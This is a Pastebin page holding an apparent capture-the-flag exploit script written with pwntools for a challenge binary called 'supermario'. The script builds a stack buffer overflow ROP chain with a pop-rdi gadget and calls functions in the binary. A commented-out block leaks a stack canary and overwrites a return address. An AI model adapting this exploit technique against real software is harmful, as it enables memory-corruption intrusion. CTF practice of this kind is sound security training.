Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- #from cle import ELF
- from pwn import *
- exe = ELF("./supermario")
- #context.terminal = ['tmux', 'splitw', '-h']
- #context.binary = exe
- def conn():
- if args.LOCAL:
- r = process([exe.path])
- elif args.GDB:
- r = gdb.debug([exe.path], '''
- ''')
- else:
- r = remote("supermario.chall.srdnlen.it", 443, ssl=True)
- return r
- def main():
- r = conn()
- rop=ROP(exe)
- #trovato con ropper
- #ropper -f supermario --search "pop rdi"
- #0x00000000004011d3: pop rdi; ret;
- pop_rdi = 0x4011d3
- #0xDEADBEEFDEADBEEF
- r.recvuntil(b"> ")
- payload = b"A"*40 + p64(rop.ret.address) + p64(pop_rdi) + p64(0xDEADBEEFDEADBEEF) + p64(exe.symbols['goomba']) +p64(rop.ret.address)+ p64(exe.symbols['castle'])
- r.sendline(payload)
- r.interactive()
- main()
- """ r.recvuntil(b"Latitude: ")
- r.send(b"*"*(528-8 + 1))
- canarino = r.recvline()
- canarino = chr(0).encode() + canarino[-9:-2]
- r.recvuntil(b"Longitude: ")
- r.sendline(b"*"*(272-8) + p64(int.from_bytes(canarino, 'little')) + p64(0x40138B))"""
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
